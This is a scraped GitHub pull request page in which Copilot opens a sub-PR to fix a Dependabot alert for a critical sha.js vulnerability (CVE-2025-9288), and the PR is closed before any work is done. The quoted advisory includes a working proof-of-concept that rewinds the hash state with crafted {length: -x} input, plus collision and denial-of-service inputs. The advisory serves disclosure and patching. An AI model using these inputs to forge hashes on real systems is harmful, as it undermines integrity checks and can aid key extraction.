[WIP] Fix dependabot alert #105 for sha.js type checks by Copilot · Pull Request #277 · Vizzuality/fora

Copilot · 2026-02-23T12:25:14Z

Thanks for the feedback on #274. I've created this new PR, which merges into #274, to address your comment. I will work on the changes and keep this PR's description up to date as I make progress.

Original PR: #274
Triggering comment (#274 (comment)):

@copilot

Dependabot Security Alert

{
  "number": 105,
  "state": "open",
  "dependency": {
    "package": {
      "ecosystem": "npm",
      "name": "sha.js"
    },
    "manifest_path": "client/pnpm-lock.yaml",
    "scope": "runtime",
    "relationship": "transitive"
  },
  "security_advisory": {
    "ghsa_id": "GHSA-95m3-7q98-8xr5",
    "cve_id": "CVE-2025-9288",
    "summary": "sha.js is missing type checks leading to hash rewind and passing on crafted data",
    "description": "### Summary\n\nThis is the same as [GHSA-cpq7-6gpm-g9rc](https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc) but just for `sha.js`, as it has its own implementation.\n\nMissing input type checks can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.\n\n### Details\n\nSee PoC\n\n### PoC\n```js\nconst forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])\n\nconst sha = require('sha.js')\nconst { randomBytes } = require('crypto')\n\nconst sha256 = (...messages) => {\n  const hash = sha('sha256')\n  messages.forEach((m) => hash.update(m))\n  return hash.digest('hex')\n}\n\nconst validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever\n\nconst payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')\nconst receivedMessage = JSON.parse(payload) // e.g. over network, whatever\n\nconsole.log(sha256(...validMessage))\nconsole.log(sha256(...receivedMessage))\nconsole.log(receivedMessage[0])\n```\n\nOutput:\n```\n638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4\n638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4\nHashed input means safe\n```\n\nOr just:\n```console\n> require('sha.js')('sha256').update('foo').digest('hex')\n'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'\n> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')\n'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'\n```\n\n### Impact\n\n1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.\n2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }`\n    This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js)\n4. DoS on `{length:'1e99'}`\n5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)",
    "severity": "critical",
    "identifiers": [
      {
        "value": "GHSA-95m3-7q98-8xr5",
        "type": "GHSA"
      },
      {
        "value": "CVE-2025-9288",
        "type": "CVE"
      }
    ],
    "references": [
      {
        "url": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5"
      },
      {
        "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288"
      },
      {
        "url": "https://github.com/browserify/sha.js/pull/78"
      },
      {
        "url": "https://github.com/browserify/sha.js/commit/f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5"
      },
      {
        "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
      },
      {
        "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00016.html"
      },
      {
        "url": "https://github.com/advisories/GHSA-95m3-7q98-8xr5"
      }
    ],
    "published_at": "2025-08-21T14:47:55Z",
    "updated_at": "2025-11-03T21:35:27Z",
    "withdrawn_at": null,
    "vulnerabilities": [
      {
        "package": {
          "ecosystem": "npm",
          "name": "sha.js"
        },
        "severity": "critical",
        "vulnerable_version_range": "<= 2.4.11",
        "first_patched_version": {
          "identifier": "2.4.12"
        }
      }
    ],
    "cvss_severities": {
      "cvss_v3": {
        "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "score": 9.1
      },
      "cvss_v4": {
        "vector_string": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N",
        "score": 9.1
      }
    },
    "epss": {
      "percentage": 0.00041,
      "percentile": 0.12475
    },
    "cvss": {
      "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "score": 9.1
    },
    "cwes": [
      {
        "cwe_id": "CWE-20",
        "name": "Improper Input Validation"
      }
    ]
  },
  "security_vulnerability": {
    "package": {
      "ecosystem": "npm",
      "name": "sha.js"
    },
    "severity": "critical",
    "vulnerable_version_range": "<= 2.4.11",
    "first_patched_version": {
      "identifier": "2.4.12"
    }
  },
  "url": "https://api.github.com/repos/Vizzuality/fora/dependabot/alerts/105",
  "html_url": "https://github.com/Vizzuality/fora/security/dependabot/105",
  "created_at": "2025-08-21T23:57:43Z",
  "updated_at": "2025-08-21T23:57:43Z",
  "dismissal_request": null,
  "dismissed_at": null,
  "dismissed_by": null,
  "dismissed_reason": null,
  "dismissed_comment": null,
  "fixed_at": null,
  "auto_dismissed_at": null
}

Task

Analyze the alert above and fix the vulnerability.

Update the affected dependency to the patched version if available.
If no patch exists, evaluate mitigations or alternatives.
Run the existing tests to confirm nothing breaks.
Advisory references: GHSA-95m3-7q98-8xr5, https://nvd.nist.gov/vuln/detail/CVE-2025-9288, support multi-byte wide typed arrays browserify/sha.js#78, browserify/sha.js@f2a258e, https://www.cve.org/CVERecord?id=CVE-2025-9287, https://lists.debian.org/debian-lts-announce/2025/09/msg00016.html, GHSA-95m3-7q98-8xr5

✨ Let Copilot coding agent set things up for you — coding agent works faster and does higher quality work when set up for your repo.

vercel · 2026-02-23T12:25:19Z

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
fora-frontend	Ready	Preview, Comment	Feb 23, 2026 0:28am

Initial plan

b50e5d6

Copilot AI assigned Copilot and agnlez Feb 23, 2026

Copilot AI mentioned this pull request Feb 23, 2026

[Security] Fix dependabot alert #105: sha.js is missing type checks leading to hash rewind and passing on crafted data #274

Closed

vercel bot deployed to Preview February 23, 2026 12:28 View deployment

agnlez closed this Feb 23, 2026

Copilot stopped work on behalf of agnlez due to an error February 23, 2026 12:32
Pull request is not open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[WIP] Fix dependabot alert #105 for sha.js type checks#277

[WIP] Fix dependabot alert #105 for sha.js type checks#277
Copilot wants to merge 1 commit intocopilot/fix-dependabot-alert-105from
copilot/sub-pr-274

Copilot AI commented Feb 23, 2026

Uh oh!

vercel bot commented Feb 23, 2026 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

Copilot AI commented Feb 23, 2026

Dependabot Security Alert

Task

Uh oh!

vercel bot commented Feb 23, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

vercel bot commented Feb 23, 2026 •

edited

Loading